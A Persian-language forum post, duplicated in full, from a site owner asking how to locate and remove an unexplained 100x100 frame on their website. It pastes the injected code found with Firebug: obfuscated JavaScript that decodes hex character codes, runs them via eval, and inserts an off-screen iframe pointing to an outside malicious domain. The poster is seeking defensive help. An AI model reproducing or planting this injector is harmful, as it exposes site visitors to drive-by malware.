mehrtadbir
سه شنبه 24 اردیبهشت 1392, 04:59 صبح
سلام
در گوشه سمت چپ یک سایت یک فریم 100 * 100 نمایش داده میشه
با فایرباگ کدهای مربوط به آنرا درآوردیم که کدهای زیر هستند
<script>
w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document ;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6 b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64, 5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0, 60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a ,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69 ,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,3 4,1e,5f,6b,6b,67,31,26,26,60,65,64,66,65,60,65,5e, 6a,5d,6c,5b,6a,25,65,5c,6b,26,63,65,59,65,61,60,62 ,5f,5b,5f,36,5d,66,67,5f,65,65,60,6c,60,6e,66,5c,3 4,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e, 28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e ,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,2 7,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32, 67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c ,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,6 6,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19, 20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60 ,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d ,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6 b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c, 1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c ,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,60,6 5,64,66,65,60,65,5e,6a,5d,6c,5b,6a,25,65,5c,6b,26, 63,65,59,65,61,60,62,5f,5b,5f,36,5d,66,67,5f,65,65 ,60,6c,60,6e,66,5c,34,2c,28,2f,2d,2e,2c,28,1e,20,3 2,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28, 27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b ,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,6 6,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c, 1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e ,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1 e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25, 6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60 ,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66 ,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6 b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70, 1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b ,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+634!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq +(w[j]))+9);}za=e;za(s)}
</script><iframe width="100" height="100" src="http://inmoningsfuds.net/lnbnjikhdh?fophnniuiwoe=5186751" style="left: -10000px; top: 0px; position: absolute;">#document<html><head><title>
404 Not Found
</title></head><body bgcolor="white"><center><h1>
404 Not Found
</h1></center><hr></hr><center>
nginx/1.1.19
</center></body></html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
</iframe>
حالا نمی دونم این رمز شده هست یا به همین صورت در یکی از فایلهای سایت وجود داره ؟
لطفا راهنمایی کنید چطور می تونیم پیداش کرده و برطرفش نماییم
با تشکر
در گوشه سمت چپ یک سایت یک فریم 100 * 100 نمایش داده میشه
با فایرباگ کدهای مربوط به آنرا درآوردیم که کدهای زیر هستند
<script>
w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document ;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6 b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64, 5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0, 60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a ,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69 ,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,3 4,1e,5f,6b,6b,67,31,26,26,60,65,64,66,65,60,65,5e, 6a,5d,6c,5b,6a,25,65,5c,6b,26,63,65,59,65,61,60,62 ,5f,5b,5f,36,5d,66,67,5f,65,65,60,6c,60,6e,66,5c,3 4,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e, 28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e ,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,2 7,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32, 67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c ,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,6 6,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19, 20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60 ,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d ,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6 b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c, 1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c ,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,60,6 5,64,66,65,60,65,5e,6a,5d,6c,5b,6a,25,65,5c,6b,26, 63,65,59,65,61,60,62,5f,5b,5f,36,5d,66,67,5f,65,65 ,60,6c,60,6e,66,5c,34,2c,28,2f,2d,2e,2c,28,1e,20,3 2,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28, 27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b ,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,6 6,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c, 1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e ,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1 e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25, 6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60 ,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66 ,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6 b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70, 1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b ,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+634!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq +(w[j]))+9);}za=e;za(s)}
</script><iframe width="100" height="100" src="http://inmoningsfuds.net/lnbnjikhdh?fophnniuiwoe=5186751" style="left: -10000px; top: 0px; position: absolute;">#document<html><head><title>
404 Not Found
</title></head><body bgcolor="white"><center><h1>
404 Not Found
</h1></center><hr></hr><center>
nginx/1.1.19
</center></body></html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
</iframe>
حالا نمی دونم این رمز شده هست یا به همین صورت در یکی از فایلهای سایت وجود داره ؟
لطفا راهنمایی کنید چطور می تونیم پیداش کرده و برطرفش نماییم
با تشکر